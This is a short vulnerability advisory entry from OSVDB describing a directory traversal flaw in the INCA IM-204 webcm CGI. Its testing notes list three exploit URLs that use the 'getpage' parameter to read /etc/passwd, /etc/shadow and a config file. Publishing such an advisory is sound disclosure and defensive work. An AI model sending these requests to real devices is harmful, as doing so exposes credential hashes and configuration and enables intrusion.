INCA IM-204 webcm getpage Traversal Arbitrary File Access

2006-10-23T05:49:02
ID OSVDB:30076
Type osvdb
Reporter OSVDB
Modified 2006-10-23T05:49:02

Description

Manual Testing Notes

http://[target]/cgi-bin/webcm?getpage=/./././././././etc/passwd http://[target]/cgi-bin/webcm?getpage=/./././././././etc/shadow http://[target]/cgi-bin/webcm?getpage=/./././././././etc/config.xml

References:

Secunia Advisory ID:22557 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0390.html ISS X-Force ID: 29815 FrSIRT Advisory: ADV-2006-4223 CVE-2006-5607 Bugtraq ID: 20696